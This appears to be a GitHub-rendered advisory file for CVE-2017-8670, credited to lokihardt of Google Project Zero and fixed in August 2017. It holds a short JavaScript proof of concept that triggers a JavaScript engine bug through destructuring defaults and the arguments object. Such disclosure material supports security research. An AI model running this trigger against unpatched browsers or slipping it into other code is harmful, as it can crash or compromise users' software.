Skip to content

Latest commit

 

History

History
22 lines (15 loc) · 385 Bytes

CVE-2017-8670.md

File metadata and controls

22 lines (15 loc) · 385 Bytes

CVE-2017-8670

  • Fix: Aug 2017
  • Credit: lokihardt of Google Project Zero

PoC

function f() {
    ({a = ([arguments]) => {
    }} = 1);

    arguments.x;
}

f();

Reference